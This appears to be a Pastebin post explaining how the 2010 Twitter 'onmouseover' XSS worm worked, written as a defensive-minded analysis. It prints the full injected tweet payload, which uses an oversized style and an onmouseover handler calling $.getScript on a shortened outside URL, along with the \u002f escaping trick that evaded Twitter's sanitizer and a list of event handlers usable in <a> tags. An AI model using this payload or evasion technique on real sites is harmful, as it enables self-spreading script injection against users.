Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How Twitter worm "onmouseover" (and other ;) works.
- This bug should be called "input sanitization" not "XSS" and not "onmouseover bug"
- Usually twitter will sanitize user input like <html> tags so it won't change the page display or behavior.
- When you tweet like in the twitter/ they will create the link (add <a href> tag for you)
- But twitter forget to sanitize the link after @ symbol
- This is when you tweet: http://www.google.com/ twitter will show like this:
- ################################################
- <a href="http://www.google.com/">
- http://www.google.com/
- </a>
- ################################################
- But when you tweet this:
- http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
- twitter will show like this:
- ################################################
- <a href="http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/">
- http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
- </a>
- ################################################
- Then normal link can become a very dangerous link
- Notice that you can add a lot of thing to do with this like, but I'll explain what this worm do.
- ************************************
- style="font-size:999999999999px;"
- ************************************
- This to enlarge the font so it cover large area, then user can easy move thier mouse over it
- ************************************************************************
- onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"
- ************************************************************************
- This is tricky part, twitter.com uses jQuery JavaScript framework so life of hacker become much easiler
- jQuery Function .getscript() use to load external javascript from any source
- and \u002f is / symbol this also tricky to avoid twitter sanitizer to clean it out
- so the real link of script is:
- http://is.gd/fl9A7
- List of JavaScript trigger that works with <a> tag:
- onfocus, onblur, onclick, ondblclick, onmousedown, onmouseup, onmouseover, onmousemove, onmouseout, onkeypress, onkeydown, onkeyup
- Information about jQuery JavaScript Framework:
- jQuery http://docs.jquery.com/Main_Page
- - @anusoft
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement